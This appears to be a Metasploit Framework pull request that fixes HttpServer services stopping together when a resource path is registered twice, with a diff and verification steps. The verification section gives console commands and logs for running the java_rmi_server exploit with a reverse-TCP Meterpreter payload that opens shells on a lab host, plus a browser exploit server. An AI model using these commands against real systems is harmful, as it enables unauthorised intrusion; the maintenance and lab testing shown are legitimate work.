### PR TITLE
Fix #6445, Unexpected HttpServer terminations due to registering the same resource more than once

### DIFF
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -162,10 +162,6 @@ module Exploit::Remote::TcpServer
           self.service.stop
         end
 
-        if service.kind_of?(Rex::Proto::Http::Server)
-          service.stop
-        end
-
         self.service = nil
       rescue ::Exception
       end

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -187,6 +187,23 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
+  def cleanup
+    # Normally service termination should not be managed on the module's level, but this is a
+    # special case.
+    #
+    # Originally this special service termination routine was implemented in
+    # Exploit::Remote::TcpServer#stop_service, but that would actually cause all HttpServers to stop
+    # if one of them attempts to register a resource that is already taken, which seems to be a
+    # harsh punishment. This is why the fix is moved here.
+    #
+    # See references:
+    # https://github.com/rapid7/metasploit-framework/pull/4203
+    # https://github.com/rapid7/metasploit-framework/issues/6445
+    service.stop if service
+
+    super
+  end
+
   def autofilter
     return true
   end


### PR DESCRIPTION
Fix #6445
## Problem

When an HttpServer instance is trying to register a resource that is already taken, it causes all HttpServers to terminate, which is not a desired behavior.
## Root Cause

It appears the Msf::Exploit::Remote::TcpServer#stop_service method is causing the problem. When the service is being detected as an HttpServer, the #stop method used actually causes all servers to stop, not just for a specific one. This stopping route was introduced in 04772c894617da83afe4601d8d8bb3157b131b60, when Juan noticed that the java_rmi_server exploit could not be run again after the first time.
## Verification

There are 2 scenarios you must test.

**Retest java_jmx_server**
- [x] Start a Windows box
- [x] Install Java 7.0 SDK: http://www.oldapps.com/en/java.php?old_java=6146?download
- [x] Open a new command line prompt, do: `C:\Program Files\Java\jdk1.7.0\bin`
- [x] At the Java bin directory, do: `start rmiregistry.exe`, that should start the RMI server.
- [x] Start msfconsole
- [x] Do: `use exploit/multi/misc/java_rmi_server`
- [x] Do: `set RHOST [The RMI server's IP]`
- [x] Do: `set SRVHOST [The attacker's IP]`
- [x] Do: `set PAYLOAD java/meterpreter/reverse_tcp`
- [x] Do: `set LHOST [The attacker's IP]`
- [x] Do: `run`
- [x] You should see a shell
- [x] At the meterpreter, type: `exit`
- [x] Do: `run` again
- [x] You should see a shell again

Demonstration for the above steps:

```
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > set RHOST 192.168.1.188
RHOST => 192.168.1.188
msf exploit(java_rmi_server) > set SRVHOST 192.168.1.199
SRVHOST => 192.168.1.199
msf exploit(java_rmi_server) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > set LHOST 192.168.1.199
LHOST => 192.168.1.199
msf exploit(java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] Using URL: http://192.168.1.199:8080/6BRv6Ch7zh
[*] Server started.
[*] 192.168.1.188:1099 - Sending RMI Header...
[*] 192.168.1.188:1099 - Sending RMI Call...
[*] 192.168.1.188    java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45741 bytes) to 192.168.1.188
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.188:51032) at 2016-01-07 17:33:56 -0600
[*] Server stopped.

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.188 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] Using URL: http://192.168.1.199:8080/Z7WUspq
[*] Server started.
[*] 192.168.1.188:1099 - Sending RMI Header...
[*] 192.168.1.188:1099 - Sending RMI Call...
[*] 192.168.1.188    java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45741 bytes) to 192.168.1.188
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.188:51034) at 2016-01-07 17:34:01 -0600
[*] Server stopped.

meterpreter >
```

**Test the repeated resource scenario**
- [x] Start msfconsole
- [x] Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
- [x] Do: `set URIPATH test`
- [x] Do: `run`
- [x] You should see that the exploit server has started (as a background job).
- [x] At the msf prompt, do: `run` again
- [x] You should see this error message: `Exploit failed: Rex::RuntimeError The supplied resource '/test' is already added.`
- [x] At the msf prompt, do: `jobs`
- [x] There should be still one exploit background job running (this would be the first one you started)
- [x] Check port 8080 (default HttpServer port), it should be listening.

Demo for the above steps:

```
msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH test
URIPATH => test
msf exploit(firefox_xpi_bootstrapped_addon) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.199:4444 
msf exploit(firefox_xpi_bootstrapped_addon) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.199:8080/test
[*] Server started.

msf exploit(firefox_xpi_bootstrapped_addon) > run
[*] Exploit running as background job.

[-] Handler failed to bind to 192.168.1.199:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
msf exploit(firefox_xpi_bootstrapped_addon) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.199:8080/test
[-] Exploit failed: Rex::RuntimeError The supplied resource '/test' is already added.
[*] Server stopped.

msf exploit(firefox_xpi_bootstrapped_addon) > jobs

Jobs
====

  Id  Name                                                   Payload                    LPORT
  --  ----                                                   -------                    -----
  0   Exploit: multi/browser/firefox_xpi_bootstrapped_addon  generic/shell_reverse_tcp  4444

msf exploit(firefox_xpi_bootstrapped_addon) > 
```
